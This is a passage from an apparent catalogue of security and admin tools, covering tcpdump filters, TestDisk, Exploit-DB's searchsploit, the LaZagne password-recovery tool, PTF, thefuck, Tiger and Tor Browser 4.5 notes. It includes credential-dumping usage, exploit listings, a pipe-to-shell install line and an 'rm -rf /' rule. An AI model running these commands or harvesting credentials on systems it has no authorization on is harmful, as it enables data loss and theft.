flags & arguments arrangements and execute the command
that you want.
-Z user
--relinquish-privileges=user
If tcpdump is running as root, after opening the capture device
or input savefile, but before opening any savefiles for output,
change the user ID to user and the group ID to the primary
group of user.
This behavior can also be enabled by default at compile time.
expression
selects which packets will be dumped. If no expression is given,
all packets on the net will be dumped. Otherwise, only packets
for which expression is `true' will be dumped. For the
expression syntax, see pcap-filter(7).
The expression argument can be passed to tcpdump as either
a single Shell argument, or as multiple Shell arguments,
whichever is more convenient. Generally, if the expression
contains Shell metacharacters, such as backslashes used to
escape protocol names, it is easier to pass it as a single,
quoted argument rather than to escape the Shell
metacharacters. Multiple arguments are concatenated with
spaces before being parsed.
EXAMPLES
To print all packets arriving at or departing from sundown:
tcpdump host sundown
To print traffic between helios and either hot or ace:
tcpdump host helios and $ hot or ace $

To print all IP packets between ace and any host except helios:
tcpdump ip host ace and not helios
To print all traffic between local hosts and hosts at Berkeley:
tcpdump net ucb-ether
To print all ftp traffic through internet gateway snup: (note that
the expression is quoted to prevent the shell from
(mis-)interpreting the parentheses):
tcpdump 'gateway snup and (port ftp or ftp-data)'
To print traffic neither sourced from nor destined for local hosts
(if you gateway to one other net, this stuff should never make it
onto your local net).
tcpdump ip and not net localnet
To print the start and end packets (the SYN and FIN packets)
of each TCP conversation that involves a non-local host.
tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0 and not src
and dst net localnet'
To print all IPv4 HTTP packets to and from port 80, i.e. print
only packets that contain data, not, for example, SYN and FIN
packets and ACK-only packets. (IPv6 is left as an exercise for
the reader.)
tcpdump 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) ((tcp[12]&0xf0)>>2)) != 0)'
To print IP packets longer than 576 bytes sent through gateway
snup:
tcpdump 'gateway snup and ip[2:2] > 576'
To print IP broadcast or multicast packets that were not sent via
Ethernet broadcast or multicast:
tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224'

To print all ICMP packets that are not echo requests/replies
(i.e., not ping packets):
tcpdump 'icmp[icmptype] != icmp-echo and
icmp[icmptype] != icmp-echoreply'
Download Tcpdump
TEEMIP - IP ADDRESS MANAGEMENT SOLUTION
All network administrators do recognize how important it is to

have a well managed IP space: a comprehensive and up to
date inventory of all subnets and IPs used in a network as well
as clear and simple processes to request, change or release
IPs are underlying key factors for a trouble free network.
Unfortunately, in many companies or organizations, IP
Management is not perceived as a critical service of IT

operations. And when it is recognized as such, the price of
standard solutions sold from software vendors is so high that
investment in a tool is always postponed to the next fiscal
exercise.
As a consequence, network administrators often struggle to
keep a decent inventory of their IP space and they rely by
default on inconvenient Excel spread sheets or DNS
configuration files to do their job.
TeemIp application has been created to precisely answer that
problematic. It is a robust Open Source web 2.0 solution that
enables professional IP Management activity within IT
departments of all size.
A simple and powerful user interface will allow network
administrators to manage their IPv4 and IPv6 Plans, subnet
space and IPs in accordance with best in class IP Management
practices:
Define your IPv4 and IPv6 Plans through hierarchical
Network Blocks
Delegate IP blocks from parent to child organizations
Manage Subnets within predefined Network Blocks
Attach IP Ranges to your Subnets
Register IPs and get a clear view on the IP space
consumption
Allow end user to log IP requests through a simple WEB
portal
Provide Hostmasters efficient processes to manage user
requests
Proactively notify administrators on key events
Synchronize your data with external tools
Because IPs are configured on network devices, a CMDB
(Configuration Management Data Base) has been included in
the product. This CMDB allows you to document all types of

devices that can be connected to an IP network together with
their linkage toward the IP space (IPs they use, like
management IPs, or IPs they host, like on router interfaces).
In order to provide to the end users an easy way to log IP
related requests, a WEB portal has been incorporated to
TeemIp. Tickets created through that portal are then processed
through a Helpdesk module thus providing to the network
administrator a quick, efficient and easy process to allocate,
change or release IP resources.
TeemIp has been developped as an extension of iTop open
source ITSM and CMDB software and therefore benefits from
all its features and advanced functions. It is available as a
standalone application or as a module that can be installed on
an already working iTop solution.
TeemIp application is relying on Apache, MySQL and PHP, so
it can run on whatever operating system supporting those
applications: it has been already tested on Windows, Linux
Debian and Redhat. Because it is a web based application you
dont need to install any client on user PC. A simple web
browser is enough to use it.
DownloadTeemIp
TESTDISK - PARTITION RECOVERY AND FILE UNDELETE
FOR WINDOWS, LINUX AND MAC
TestDisk is powerful free data recovery software! It was

primarily designed to help recover lost partitions and/or make
non-booting disks bootable again whenthese symptoms are
caused by faulty software: certain types of viruses or human
error (such as accidentally deleting a Partition Table). Partition
table recovery using TestDisk is really easy.
TestDisk can:
Fix partition table, recover deleted partition
Recover FAT32 boot sector from its backup
Rebuild FAT12/FAT16/FAT32 boot sector
Fix FAT tables
Rebuild NTFS boot sector
Recover NTFS boot sector from its backup
Fix MFT using MFT mirror

Locate ext2/ext3/ext4 Backup SuperBlock
Undelete files from FAT, exFAT, NTFS and ext2
filesystem
Copy files from deleted FAT, exFAT, NTFS and ext2/ext3/
ext4 partitions.
TestDisk has features for both novices and experts. For those
who know little or nothing about data recovery techniques,
TestDisk can be used to collect detailed information about a
non-booting drive which can then be sent to a tech for further
analysis. Those more familiar with such procedures should find
TestDisk a handy tool in performing onsite recovery.
Operating systems
TestDisk can run under

DOS (either real or in a Windows 9x DOS-box),
Windows (NT4, 2000, XP, 2003, Vista, 2008, Windows 7
(x86 & x64),
Linux,
FreeBSD, NetBSD, OpenBSD,
SunOS and
MacOS X
Filesystems
TestDisk can find lost partitions for all of these file systems:
BeFS ( BeOS )
BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
CramFS, Compressed File System
DOS/Windows FAT12, FAT16 and FAT32
XBox FATX
Windows exFAT
HFS, HFS+ and HFSX, Hierarchical File System
JFS, IBM's Journaled File System
Linux btrfs
Linux ext2, ext3 and ext4

Linux GFS2
Linux LUKS encrypted partition
Linux RAID md 0.9/1.0/1.1/1.2
RAID 1: mirroring
RAID 4: striped array with parity device
RAID 5: striped array with distributed parity
information
RAID 6: striped array with distributed dual
redundancy information
Linux Swap (versions 1 and 2)
LVM and LVM2, Linux Logical Volume Manager
Mac partition map
Novell Storage Services NSS
NTFS ( Windows NT/2000/XP/2003/Vista/2008/7 )
ReiserFS 3.5, 3.6 and 4
Sun Solaris i386 disklabel
Unix File System UFS and UFS2 (Sun/BSD/...)
XFS, SGI's Journaled File System
Wii WBFS
Sun ZFS
DownloadTestDisk
THE EXPLOIT-DATABASE GIT REPOSITORY
This is the official repository of The Exploit Database, a project

sponsored by Offensive Security.
The Exploit Database is an archive of public exploits and
corresponding vulnerable software, developed for use by
penetration testers and vulnerability researchers. Its aim is to
serve as the most comprehensive collection of exploits
gathered through direct submissions, mailing lists, and other
public sources, and present them in a freely-available and
easy-to-navigate database. The Exploit Database is a
repository for exploits and proof-of-concepts rather than
advisories, making it a valuable resource for those who need
actionable data right away.
This repository is updated daily with the most recently added
submissions.
Included with this repository is the searchsploit utility, which
will allow you to search through the exploits using one or more
terms.
root@kali:~# searchsploit -h
Usage
: searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local

=========
OPTIONS
=========
-c
- Perform case-sensitive searches; by
default,
searches will try to be greedy
-v
- By setting verbose output, description
lines
are allowed to overflow their columns
-h, --help - Show help screen
NOTES:
- Use any number of search terms you would like
(minimum: 1)
- Search terms are not case sensitive, and order is
irrelevant
root@kali:~# searchsploit afd windows local
---------------------------------------------------------------|---------------------------------Description
|
Path
---------------------------------------------------------------|---------------------------------MS Windows XP/2003 AFD.sys Privilege Escalation Exploit

(K-plug | /windows/local/6757.txt
Microsoft Windows xp AFD.sys Local Kernel DoS Exploit
| /windows/dos/17133.c
Windows XP/2003 Afd.sys - Local Privilege Escalation
Exploit (M | /windows/local/18176.py
Windows - AfdJoinLeaf Privilege Escalation (MS11-080)
| /windows/local/21844.rb
---------------------------------------------------------------|---------------------------------root@kali:~#
Download The Exploit-Database Git Repository

THE LAZAGNE PROJECT - RECOVER MOST COMMON
SOFTWARE PASSWORDS (FIREFOX, IE, OPERA,
CHROME, FILEZILLA, WINSCP, COREFTP, WIFI AND
MANY MORE)
The LaZagne project is an open source application used to

retrieve lots of passwords stored on a local computer. Each
software stores its passwords using different technics
(plaintext, using api, custom algorithms, etc.). This tool has
been developped to find these passwords for most common
softwares. At this moment, it supports 22 softwares on windows
and 12 on a linux plateform.
Usage
Launch all modules

cmd: laZagne.exe all
Launch only a specific module
cmd: laZagne.exe
example: laZagne.exe browsers

help: laZagne.exe -h
Launch only a specific software script
cmd: laZagne.exe
example: laZagne.exe browsers -f
help: laZagne.exe browsers -h
Write all passwords found into a file (-w options)
cmd: laZagne.exe all -w
Supported softwares
Windows (tested on Windows XP, 7 and 8 - 32 and 64

bits)
browsers
firefox
chrome
opera
ie
chats
skype
pidgin
jitsi
mails
thunderbird
outlook
adminsys
filezilla
puttycm
winscp
cyberduck
coreFTP
FTPNavigator
database
sqldeveloper
squirrel
dbvisualizer
svn
tortoise
wifi
Wireless Network Password (Windows
mechanism)
windows credentials
Domain visible network (.Net Passport)
Generic network credentials
Linux
browsers
firefox
opera
chats
pidgin
jitsi
mails
thunderbird
adminsys
filezilla
environment variables
database
sqldeveloper
squirrel
dbvisualizer
wifi
network manager
wallet
gnome keyring
IE Browser history
Internet Explorer passwords (from ie7 and before windows 8)

can only be decrypted using the URL of the website. This one
is used as an argument of the Win32CryptUnprotectData api.
So to decrypt it, it is necessary to retreive the browser history of
ie. To do that, I have used C code. So I used a dll (the code is
on on the "browser_history_dll" directory) and it is directly
embedded to the python code as a base64 string (c.f. ie.py).

Once launched, the dll is written to the disk, a wrapper is used
to call dll functions and then the dll file is removed from the
disk.
Build your own password recovery script

It is possible to write your own script for the software of your
choice.
To do that, some syntax requirements are needed:
Create a class using the name of the software
This class has to have a function called
"retrieve_password" (it will be the main function)
The output containing all passwords has to be send to the
"print_output" function - ex: print_output(, password_list)
password_list has to be an array of dictionnaries.
Optional: you could use the function "print_debug" to print
your output
ex: print_debug("ERROR", "Failed to load ...")
Use an existing script to understand what I have said :)
If you want to improve this tool, you could send me your script
and it will be added to this project (authors will be of course
credited on each script ;)).
Requirements
To compile the source code, some external library are required.

For Windows
Wconio (for the color)
http://newcenturycomputers.net/projects/
wconio.html
http://newcenturycomputers.net/projects/
download.cgi/WConio-1.5.win32-py2.7.exe
Python for Windows Extensions
http://sourceforge.net/projects/pywin32/
For Linux
None
Download The LaZagne Project

THE PENETRATION TESTERS FRAMEWORK (PTF) - IS A
WAY FOR MODULAR SUPPORT FOR UP-TO-DATE TOOLS
A TrustedSec Project - The PenTesters Framework (PTF) is a

Python script designed for Debian/Ubuntu based distributions
to create a similar and familiar distribution for Penetration
Testing. As pentesters, we've been accustom to the /pentest/
directories or our own toolsets that we want to keep up-to-date
all of the time. We have those "go to" tools that we use on a
regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools
(latest and greatest), compile them, build them, and make it so
that you can install/update your distribution on any machine.

Everything is organized in a fashion that is cohesive to the
Penetration Testing Execution Standard (PTES) and eliminates
a lot of things that are hardly used. PTF simplifies installation
and packaging and creates an entire pentest framework for
you. Since this is a framework, you can configure and add as
you see fit. We commonly see internally developed repos that
you can use as well as part of this framework. It's all up to you.
The ultimate goal is for community support on this project. We
want new tools added to the github repository. Submit your
modules. It's super simple to configure and add them and only
takes a few minute.
Instructions:
First check out the config/ptf.config file which contains the base
location of where to install everything. By default this will install
in the /pentest directory. Once you have that configured, move
to running PTF by typing ./ptf (or python ptf).
This will put you in a Metasploitesk type shell which has a
similar look and feel for consistency. Show modules, use , etc.
are all accepted commands. First things first, always type help
or ? to see a full list of commands.
Update EVERYTHING!
If you want to install and/or update everything, simply do the
following:
./ptf
use modules/install_update_all
run
This will install all of the tools inside of PTF. If they are already
installed, this will iterate through and update everything for you
automatically.
You can also show options to change information about the
modules.
Modules:
First, head over to the modules/ directory, inside of there are
sub directories based on the Penetration Testing Execution
Standard (PTES) phases. Go into those phases and look at the
different modules. As soon as you add a new one, for example
testing.py, it will automatically be imported next time you launch
PTF. There are a few key components when looking at a
module that must be completed.
Below is a sample module
Module Development:
All of the fields are pretty easy, on the repository locations, right
now all thats supported is GIT. The plan in the next release is
to expand to file downloader. This can still be accomplished
through after commands (explained later). Fill in the depends,
and where you want the install location to be. PTF will take
where the python file is located (for example exploitation) and
move it to what you specify in the PTF config (located under
config). By default it installs all your tools to /pentest//
Note in modules, you can specify after commands
{INSTALL_LOCATION}. This will append where you want the
install location to go when using after commands.
After Commands:
After commands are commands that you can insert after an
installation. This could be switching to a directory and kicking
off additional commands to finish the installation. For example
in the BEEF scenario, you need to run ruby install-beef
afterwards. Below is an example of after commands using the
{INSTALL_LOCATION} flag.
A F T E R _ C O M M A N D S = " c p c o n fi g / d i c t / r o c k y o u . t x t
{INSTALL_LOCATION}"
For AFTER_COMMANDS that do self install (don't need user
interaction) - place an exit after your commands so it exits the
shell.
DownloadThe Penetration Testers Framework

THEFUCK - MAGNIFICENT APP WHICH CORRECTS YOUR
PREVIOUS CONSOLE COMMAND
Few examples:
apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open
(13: Permission denied)
E: Unable to lock the administration directory (/var/lib/
dpkg/), are you root?
fuck
sudo apt-get install vim [enter///ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...
git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as
upstream, use
git push --set-upstream origin master
fuck
git push --set-upstream origin master [enter///ctrl+c]
Counting objects: 9, done.
...
puthon
No command 'puthon' found, did you mean:
Command 'python' from package 'python-minimal' (main)
Command 'python' from package 'python3' (main)
zsh: command not found: puthon
fuck
python [enter///ctrl+c]
Python 3.4.2 (default, Oct
8 2014, 13:08:17)
...
git brnch
git: 'brnch' is not a git command. See 'git --help'.
Did you mean this?
branch
fuck
git branch [enter///ctrl+c]
* master
lein rpl
'rpl' is not a task. See 'lein help'.
Did you mean this?
repl
fuck
lein repl [enter///ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 nrepl://127.0.0.1:54848
REPL-y 0.3.1
...
If you are not scared to blindly run the changed command,

there is a require_confirmation settings option:
apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open
(13: Permission denied)
E: Unable to lock the administration directory (/var/lib/
dpkg/), are you root?
fuck
sudo apt-get install vim
[sudo] password for nvbn:
Reading package lists... Done
...
Requirements
python (2.7+ or 3.3+)

pip
python-dev
Installation [ experimental ]
On Ubuntu and OS X you can install The Fuck with installation

script:
wget -O - https://raw.githubusercontent.com/nvbn/thefuck/
master/install.sh | sh - && $0
Manual installation
Install The Fuck with pip :
sudo pip install thefuck
Or using an OS package manager (OS X, Ubuntu, Arch).

You should place this command in
your .bash_profile , .bashrc , .zshrc or other startup
script:
eval "$(thefuck --alias)"
# You can use whatever you want as an alias, like for
Mondays:
eval "$(thefuck --alias FUCK)"
Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).

Changes will be available only in a new shell session. To make
them available immediately, run source ~/.bashrc (or your
shell config file like .zshrc).
Update
sudo pip install thefuck --upgrade
Aliases changed in 1.34.

How it works
The Fuck tries to match a rule for the previous command,

creates a new command using the matched rule and runs it.
Rules enabled by default are as follows:
cargo runs cargo build instead of cargo ;
cargo_no_command fixes wrongs commands like cargo
buid ;
cd_correction spellchecks and correct failed cd
commands;
cd_mkdir creates directories before cd'ing into them;

cd_parent changes cd.. to cd .. ;
composer_not_command fixes composer command
name;
cp_omitting_directory adds -a when you cp
directory;
cpp11 adds missing -std=c++11 to g++ or clang++ ;
dirty_untar fixes tar x command that untarred in the
current directory;
dirty_unzip fixes unzip command that unzipped in
the current directory;
django_south_ghost adds --delete-ghostmigrations to failed because ghosts django south
migration;
django_south_merge adds --merge to inconsistent
django south migration;
docker_not_command fixes wrong docker commands
like docker tags ;
dry fixes repetitions like git git push ;
fix_alt_space replaces Alt+Space with Space
character;
fix_file opens a file with an error in your $EDITOR ;
git_add fixes "Did you forget to 'git add'?" ;
git_branch_delete changes git branch -d to git
branch -D ;
git_branch_list catches git branch list in place of
git branch and removes created branch;
git_checkout fixes branch name or creates new
branch;
git_diff_staged adds --staged to previous git diff
with unexpected output;
git_fix_stash fixes git stash commands
(misspelled subcommand and missing save );
git_not_command fixes wrong git commands like git
brnch ;
git_pull sets upstream before executing previous git
pull ;
git_pull_clone clones instead of pulling when the
repo does not exist;

git_push adds --set-upstream origin $branch to
previous failed git push ;
git_push_pull runs git pull when push was
rejected;
git_stash stashes you local modifications before
rebasing or switching branch;
git_two_dashes adds a missing dash to commands like
git commit -amend or git rebase -continue ;
go_run appends .go extension when compiling/running
Go programs
grep_recursive adds -r when you trying to grep
directory;
gulp_not_task fixes misspelled gulp tasks;
has_exists_script prepends ./ when script/binary
exists;
heroku_not_command fixes wrong heroku commands
like heroku log ;
history tries to replace command with most similar
command from history;
java removes .java extension when running Java
programs;
javac appends missing .java when compiling Java
files;
lein_not_task fixes wrong lein tasks like lein rpl ;
ls_lah adds -lah to ls ;
man changes manual section;
man_no_space fixes man commands without spaces, for
example mandiff ;
mercurial fixes wrong hg commands;
mkdir_p adds -p when you trying to create directory
without parent;
mvn_no_command adds clean package to mvn ;
mvn_unknown_lifecycle_phase fixes misspelled
lifecycle phases with mvn ;

no_command fixes wrong console commands, for
example vom/vim ;
no_such_file creates missing directories with mv and
cp commands;
open prepends http to address passed to open ;
pip_unknown_command fixes wrong pip commands, for
example pip instatl/pip install ;
python_command prepends python when you trying to
run not executable/without ./ python script;
python_execute appends missing .py when executing
Python files;
quotation_marks fixes uneven usage of ' and " when
containing args';
rm_dir adds -rf when you trying to remove directory;
sed_unterminated_s adds missing '/' to sed 's s
commands;
sl_ls changes sl to ls ;
ssh_known_hosts removes host from known_hosts on
warning;
sudo prepends sudo to previous command if it failed
because of permissions;
switch_lang switches command from your local layout
to en;
systemctl correctly orders parameters of confusing
systemctl ;
test.py runs py.test instead of test.py ;
touch creates missing directories before "touching";
tsuru_login runs tsuru login if not authenticated or
session expired;
tsuru_not_command fixes wrong tsuru commands like
tsuru shell ;
tmux fixes tmux commands;
unknown_command fixes hadoop hdfs-style "unknown
command", for example adds missing '-' to the command
on hdfs dfs ls ;
vagrant_up starts up the vagrant instance;

whois fixes whois command.
Enabled by default only on specific platforms:

apt_get installs app from apt if it not installed (requires
python-commandnotfound / python3-commandnotfound );
apt_get_search changes trying to search using aptget with searching using apt-cache ;
brew_install fixes formula name for brew install ;
brew_unknown_command fixes wrong brew commands,
for example brew docto/brew doctor ;
brew_upgrade appends --all to brew upgrade as per
Homebrew's new behaviour;
pacman installs app with pacman if it is not installed
(uses yaourt if available);
pacman_not_found fixes package name with pacman or
yaourt .
Bundled, but not enabled by default:
git_push_force adds --force to a git push (may
conflict with git_push_pull );
rm_root adds --no-preserve-root to rm -rf /
command.
Creating your own rules
For adding your own rule you should create your-rulename.py in ~/.thefuck/rules . The rule should contain two
functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]
Also the rule can contain an optional function

side_effect(old_command: Command, fixed_command: str) ->
None
and optional enabled_by_default , requires_output and

priority variables.
Command has three attributes: script , stdout and stderr .
Rules api changed in 3.0: For accessing settings in rule you
need to import it with from thefuck.conf import settings .
settings is a special object filled with ~/.thefuck/

settings.py and values from env ( see more below ).
Simple example of the rule for running script with sudo :
def match(command):
return ('permission denied' in command.stderr.lower()
or 'EACCES' in command.stderr)
def get_new_command(command):
return 'sudo {}'.format(command.script)
# Optional:
enabled_by_default = True
def side_effect(command, fixed_command):
subprocess.call('chmod 777 .', shell=True)
priority = 1000
# Lower first, default is 1000
requires_output = True
More examples of rules , utility functions for rules , app/osspecific helpers .

Settings
The Fuck has a few settings parameters which can be changed

in ~/.thefuck/settings.py :
rules list of enabled rules, by default
thefuck.conf.DEFAULT_RULES ;
exclude_rules list of disabled rules, by default [] ;
require_confirmation requires confirmation before
running new command, by default True ;
wait_command max amount of time in seconds for
getting previous command output;
no_colors disable colored output;

priority dict with rules priorities, rule with lower
priority will be matched first;
debug enables debug output, by default False .
Example of settings.py :
rules = ['sudo', 'no_command']

exclude_rules = ['git_push']
require_confirmation = True
wait_command = 10
no_colors = False
priority = {'sudo': 100, 'no_command': 9999}
debug = False
Or via environment variables:

THEFUCK_RULES list of enabled rules, like
DEFAULT_RULES:rm_root or sudo:no_command ;
THEFUCK_EXCLUDE_RULES list of disabled rules, like
git_pull:git_push ;
THEFUCK_REQUIRE_CONFIRMATION require confirmation
before running new command, true/false ;
THEFUCK_WAIT_COMMAND max amount of time in seconds
for getting previous command output;
THEFUCK_NO_COLORS disable colored output, true/
false ;
THEFUCK_PRIORITY priority of the rules, like
no_command=9999:apt_get=100 , rule with lower
priority will be matched first;
THEFUCK_DEBUG enables debug output, true/false .
For example:
export THEFUCK_RULES='sudo:no_command'
export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
export THEFUCK_REQUIRE_CONFIRMATION='true'
export THEFUCK_WAIT_COMMAND=10
export THEFUCK_NO_COLORS='false'
export THEFUCK_PRIORITY='no_command=9999:apt_get=100'
Developing
Install The Fuck for development:
python setup.py develop
Run unit tests:

py.test
Run unit and functional tests (requires docker):

py.test --enable-functional
For sending package to pypi:

sudo apt-get install pandoc
./release.py
Download Thefuck
TIGER - THE UNIX SECURITY AUDIT AND INTRUSION
DETECTION TOOL
Tiger is a security tool that can be use both as a security audit

and intrusion detection system. It supports multiple UNIX
platforms and it is free and provided under a GPL license.
Unlike other tools, Tiger needs only of POSIX tools and is
written entirely in shell language.
Tiger has some interesting features that merit its resurrection,
including a modular design that is easy to expand, and its
double edge, it can be used as an audit tool and a host
intrusion detection system tool. Free Software intrusion
detection is currently going many ways, from network IDS (with

Snort), to the kernel (LIDS, or SNARE for Linux and Systrace
for OpenBSD, for example), not mentioning file integrity
checkers (many of these: aide, integrit samhain, tripwire...) and
logcheckers (even more of these, check the Log Analysis
pages). But few of them focus on the host-side of intrusion
detection fully. Tiger complements this tools and also provides
a framework in which all of them can work together. Tiger it is
not a logchecker, nor it focused in integrity analysis. It does
"the other stuff", it checks the system configuration and status.
Read the manpage for a full description of checks implemented
in Tiger. A good example of what Tiger can do is, for example,
check_findeleted, a module that can determine which network
servers running in a system are using deleted files (because
libraries were patched during an upgrade but the server's
services not restarted).
Installation
sudo apt-get install tiger
Download Tiger
TOR BROWSER 4.5 - EVERYTHING YOU NEED TO SAFELY
BROWSE THE INTERNET
The Tor software protects you by bouncing your

communications around a distributed network of relays run by
volunteers all around the world: it prevents somebody watching
your Internet connection from learning what sites you visit, it
prevents the sites you visit from learning your physical location,
and it lets you access sites which are blocked.
The Tor Browser lets you use Tor on Windows, Mac OS X, or
Linux without needing to install any software. It can run off a
USB flash drive, comes with a pre-configured web browser to
protect your anonymity, and is self-contained.
The 4.5 series provides significant usability, security, and
privacy enhancements over the 4.0 series. Because these
changes are significant, we will be delaying the automatic
update of 4.0 users to the 4.5 series for one week.
Usability Improvements
On the usability front, we've improved the application launch

experience for both Windows and Linux users. During install,
Windows users are now given the choice to add Tor Browser to
the Start Menu/Applications view, which should make it easier
to find and launch. This choice is on by default, but can be
disabled, and only affects the creation of shortcuts - the actual
Tor Browser is still self-contained as a portable app folder. On
the Linux side, users now start Tor Browser through a new
wrapper that enables launching from the File Manager, the
Desktop, or the Applications menu. The same wrapper can also
be used from the command line.
We've also simplified the Tor menu (the green onion) and the
associated configuration windows. The menu now provides
information about the current Tor Circuit in use for a page, and
also provides an option to request a new Tor Circuit for a site.
Tor Browser is also much better at handling Tor Circuits in
general: while a site remains in active use, all associated

requests will continue to be performed over the same Tor
Circuit. This means that sites should no longer suddenly
change languages, behaviors, or log you out while you are
using them.
Figure 1: The new Tor Onion Menu
Security Improvements
On the security front, the most exciting news is the new

Security Slider. The Security Slider provides user-friendly
vulnerability surface reduction - as the security level is
increased, browser features that were shown to have a high
historical vulnerability count in the iSec Partners hardening
study are progressively disabled. This feature is available from
the Tor onion menu's "Privacy and Security Settings" choice.
Figure 2: The new Security Slider

Our Windows packages are now signed with a hardware
signing token graciously donated by DigiCert. This means that
Windows users should no longer be prompted about Tor
Browser coming from an unknown source. Additionally, our
automatic updates are now individually signed with an offline
signing key. In both cases, these signatures can be
reproducibly removed, so that builders can continue to verify
that the packages they produce match the official build binaries.
The 4.5 series also features a rewrite of the obfs2, obfs3, and
ScrambleSuit transports in GoLang, as well as the introduction
of the new obfs4 transport. The obfs4 transport provides
additional DPI and probing resistance features which prevent
automated scanning for Tor bridges. As long as they are not
discovered via other mechanisms, fresh obfs4 bridge
addresses will work in China today. Additionally, barring new
attacks, private obfs4 addresses should continue to work
indefinitely.
Privacy Improvements
On the privacy front, the 4.5 series improves on our pre-existing

first party isolation implementation to prevent third party
tracking. First party isolation provides the property that third
party advertisements, "like buttons", or "mashup" content that is
included on one site will at most only know about your activity
on that site, and will not be able to match it to your activity while
you are on any other site. In other words, with first party
isolation, Facebook, Twitter, and Google+ can't track you
around the entire web using their infamous like buttons.
Specifically, in the 4.5 release, we now ensure that blob: URIs
are scoped to the URL bar domain that created them, and the
SharedWorker API has been disabled to prevent cross-site and
third party communication. We also now make full use of Tor's
circuit isolation to ensure that all requests for any third party
content included by a site travel down the same Tor Circuit.
This isolation also ensures that requests to the same third party
site actually use separate Tor Circuits when the URL bar
domain is different. This request isolation is enforced even
when long-lived "HTTP Keep-Alive" connections are used.
We have also improved our resolution and locale fingerprinting
defenses, and we now disable the device sensor and video
statistics APIs.
New Search Provider
Our default search provider has also been changed to

Disconnect. Disconnect provides private Google search results
to Tor users without Captchas or bans.
Full Changelogs
Here is the complete list of changes in the 4.5 series since 4.0:
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Include obfs4proxy 0.0.5
Use obfs4proxy for obfs2, obfs3, obfs4, and
ScrambleSuit bridges
Pluggable Transport Dependency Updates:
Bug 15265: Switch go.net repo to golang.org/x/
net
Bug 15448: Use golang 1.4.2 for meek and
obs4proxy
Update Tor Launcher to 0.2.7.4. Changes since
0.2.7.0.2 in 4.0.8:
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13271: Display Bridge Configuration wizard
pane before Proxy pane
Bug 13576: Don't strip "bridge" from the middle
of bridge lines
Bug 13983: Directory search path fix for Tor
Messanger+TorBirdy
Bug
14122:
Hide
logo
if
TOR_HIDE_BROWSER_LOGO set
Bug 14336: Fix navigation button display issues
on some wizard panes
Bug 15657: Display the host:port of any
connection faiures in bootstrap
Bug 15704: Do not enable network if wizard is
opened
Update Torbutton to 1.9.2.2. Changes since 1.7.0.2
in 4.0.8:
Bug 3455: Use SOCKS user+pass to isolate all
requests from the same url domain
Bug 5698: Use "Tor Browser" branding in
"About Tor Browser" dialog
Bug 7255: Warn users about maximizing
windows
Bug 8400: Prompt for restart if disk records are
enabled/disabled.
Bug 8641: Create browser UI to indicate current
tab's Tor circuit IPs
(Many Circuit UI issues were fixed during
4.5; see release changelogs for those).
Bug 9387: Security Slider 1.0

Include descriptions and tooltip hints for
security levels
Notify users that the security slider exists
Make use of new SVG, jar, and MathML
prefs
Bug 9442: Add New Circuit button to Torbutton
menu
Bug 9906: Warn users before closing all
windows and performing new identity.
Bug 10216: Add a pref to disable the local tor
control port test
Bug 10280: Strings and pref for preventing
plugin initialization.
Bug 11175: Remove "About Torbutton" from
onion menu.
Bug 11236: Don't set omnibox order in
Torbutton (to prevent translation)
Bug 11449: Fix new identity error if NoScript is
not enabled
Bug 13019: Change locale spoofing pref to
boolean
Bug 13079: Option to skip control port
verification
Bug 13406: Stop directing users to downloadeasy.html.en on update
Bug 13650: Clip initial window height to 1000px
Bugs 13751+13900: Remove SafeCache cache
isolation code in favor of C++ patch
Bug 13766: Set a 10 minute circuit lifespan for
non-content requests
Bug 13835: Option to change default Tor
Browser homepage
Bug 13998: Handle changes in NoScript
2.6.9.8+
Bug 14100: Option to hide NetworkSettings
menuitem
Bug 14392: Don't steal input focus in about:tor
search box
Bug 14429: Provide automatic window resizing,
but disable for now
Bug 14448: Restore Torbutton menu operation
on non-English localizations
Bug 14490: Use Disconnect search in about:tor
search box
Bug 14630: Hide Torbutton's proxy settings tab.
Bug 14631: Improve profile access error msgs
(strings for translation).
Bugs 14632+15334: Display Cookie Protections
only if disk records are enabled

Bug 15085: Fix about:tor RTL text alignment
problems
Bug 15460: Ensure FTP urls use contentwindow circuit isolation
Bug 15502: Wipe blob: URIs on New Identity
Bug 15533: Restore default security level when
restoring defaults
Bug 15562: Bind SharedWorkers to thirdparty
pref
Bug 3455: Patch Firefox SOCKS and proxy filters to
allow user+pass isolation
Bug 4100: Raise HTTP Keep-Alive back to 115
second default
Bug 5698: Fix branding in "About Torbrowser"
window
Bug 10280: Don't load any plugins into the address
space by default
Bug 11236: Fix omnibox order for non-English builds
Also remove Amazon, eBay and bing; add
Youtube and Twitter
Bug 11955: Backport HTTPS Certificate Pinning
patches from Firefox 32
Bug 12430: Provide a preference to disable remote
jar: urls
Bugs 12827+15794: Create preference to disable
SVG images (for security slider)
Bug 13019: Prevent Javascript from leaking system
locale
Bug 13379: Sign our MAR update files
Bug 13439: No canvas prompt for content callers
Bug 13548: Create preference to disable MathML (for
security slider)
Bug 13586: Make meek use TLS session tickets (to
look like stock Firefox).
Bug 13684: Backport Mozilla bug #1066190 (pinning
issue fixed in Firefox 33)

Bug 13788: Fix broken meek in 4.5-alpha series
Bug 13875: Spoof window.devicePixelRatio to avoid
DPI fingerprinting
Bug 13900: Remove 3rd party HTTP auth tokens via
Firefox patch
Bug 14392: Make about:tor hide itself from the URL
bar
Bug 14490: Make Disconnect the default omnibox
search engine
Bug 14631: Improve startup error messages for
filesystem permissions issues
Bugs 14716+13254: Fix issues with HTTP Auth
